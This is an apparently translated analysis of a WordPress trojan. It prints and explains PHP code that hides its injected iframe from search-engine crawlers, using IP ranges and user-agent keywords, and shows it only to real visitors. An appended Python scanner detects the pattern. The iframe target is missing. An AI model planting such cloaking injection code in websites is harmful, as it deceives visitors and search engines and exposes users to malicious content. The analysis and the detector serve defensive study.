Sample Analysis of a WordPress Trojan

Source: Internet
Author: User

After seeing zuola, I got hold of a WordPress Trojan script, so I clicked the link and took a quick look at the sample. The principle is relatively simple. First it determines whether the visitor is a search engine spider or bot, and then it decides whether to output a problematic iframe; the effectiveness of the Trojan depends on the content in the iframe. This short PHP script can be used in any other PHP program.

The source code, lightly tidied up, is as follows:

    error_reporting(0);   // suppress every error message
    $bot = FALSE;         // becomes TRUE once the visitor looks like a crawler

    // User-agent substrings to exclude (list abridged in the original)
    $user_agent_to_filter = array('bot', 'spider', 'splitder', /* ... */ 'mybloglog api');

    // Start and end address of each excluded IP range (list abridged in the original)
    $stop_ips_masks = array(
        array("216.239.32.0", "216.239.63.255"),
        array("64.68.80.0", "64.68.87.255"),
        // .........
        // .........
        array("72.30.0.0", "72.30.255.255"),
        array("38.0.0.0", "38.255.255.255")
    );

    // Visitor IP as an unsigned integer
    $my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
    foreach ($stop_ips_masks as $IPs) {
        $first_d = sprintf("%u", ip2long($IPs[0]));
        $second_d = sprintf("%u", ip2long($IPs[1]));
        if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {
            $bot = TRUE;
            break;
        }
    }

    // Visitor user agent against the substring list
    foreach ($user_agent_to_filter as $bot_sign) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) != false) {
            $bot = true;
            break;
        }
    }

    // Only ordinary browsers receive the iframe
    if (!$bot) {
        echo '<iframe ...></iframe>';   // iframe attributes (including src) are not preserved on this page
    }

1. Environment configuration and variable declaration

error_reporting(0) ensures that no error is reported under any circumstances.

$bot is a flag variable. Its default value is FALSE. It indicates whether the current visitor is a real browser user (FALSE) or a bot (TRUE).

$user_agent_to_filter and $stop_ips_masks: the former is a one-dimensional array that stores a large number of user agent strings to be excluded. The latter is a two-dimensional array that stores several IP ranges used by search engines.

2. Visitor IP check

Next, the IP address and the browser user agent are used to determine whether the visitor is an ordinary browser.

    $my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
    foreach ($stop_ips_masks as $IPs) {
        $first_d = sprintf("%u", ip2long($IPs[0]));
        $second_d = sprintf("%u", ip2long($IPs[1]));
        if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {
            $bot = TRUE;
            break;
        }
    }

The ip2long function converts an IP address to an integer. sprintf('%u', xxx) converts this integer to an unsigned number.

The foreach loop walks through $stop_ips_masks and takes out each inner array of the two-dimensional array. $first_d and $second_d store the unsigned integer values of the start and end addresses of the IP range, and the if that follows checks whether the current visitor's IP address is within a range listed in $stop_ips_masks. If it is, $bot is set to TRUE.

3. Visitor user agent check

    foreach ($user_agent_to_filter as $bot_sign) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) != false) {
            $bot = true;
            break;
        }
    }

This check is similar to the IP check: each value is read from $user_agent_to_filter and compared with the browser's user agent. If a robot or a spider is found, $bot is set to true.

4. Place iframe

if (!$bot) ensures that the iframe is placed only when the visitor is an ordinary browser. The src of the iframe is a shameless web page where the junk content is hosted; Chrome has already blocked it.

5. Conclusion

This script can be used on any website written in PHP. In addition, the code could have been hidden much better, rather than streaking without even underpants.
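
A defender-side check for the pattern analysed above, as an added example that is not part of the original article: a Python scan that flags PHP source which both profiles the visitor (REMOTE_ADDR or User-Agent tests) and prints an iframe. The regexes, the function names and both sample inputs are assumptions constructed for illustration.

```python
import re

# Traits the analysis describes, written as heuristic regexes (not exact signatures).
INDICATORS = {
    "errors_suppressed": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "ip_to_integer": re.compile(r"ip2long\s*\(\s*\$_SERVER\s*\[\s*['\"]REMOTE_ADDR", re.I),
    "user_agent_match": re.compile(
        r"str(?:i?pos|i?str)\s*\(\s*\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT", re.I),
    "crawler_wordlist": re.compile(r"array\s*\([^)]*['\"]\s*(?:bot|spider|crawl)", re.I),
    "iframe_output": re.compile(r"\b(?:echo|print)\b[^;]*<\s*iframe", re.I),
}
VISITOR_CHECKS = {"ip_to_integer", "user_agent_match"}

def scan_php(source):
    """Return {indicator name: line number of first match} for one PHP source string."""
    hits = {}
    for name, pattern in INDICATORS.items():
        match = pattern.search(source)
        if match:
            hits[name] = source.count("\n", 0, match.start()) + 1
    return hits

def looks_like_cloaked_injector(source):
    """True when the code both profiles the visitor and prints an iframe."""
    hits = scan_php(source)
    return "iframe_output" in hits and bool(VISITOR_CHECKS & set(hits))

# Constructed sample, condensed from the structure analysed above; the iframe
# URL is a placeholder because the real one is not on the page.
SAMPLE_INJECTED = """<?php
error_reporting(0);
$bot = FALSE;
$user_agent_to_filter = array('bot', 'spider');
$my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
foreach ($user_agent_to_filter as $bot_sign) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) != false) { $bot = true; break; }
}
if (!$bot) { echo '<iframe src="http://placeholder.invalid/"></iframe>'; }
"""

# Constructed benign sample: prints an iframe but never inspects the visitor.
SAMPLE_BENIGN = """<?php
function embed_video($id) {
    echo '<iframe src="https://video.example/embed/' . intval($id) . '"></iframe>';
}
"""

if __name__ == "__main__":
    for label, src in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(label, looks_like_cloaked_injector(src), scan_php(src))
```

Encoded or obfuscated variants will not match these patterns, so a clean result is inconclusive rather than proof that a file is safe.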
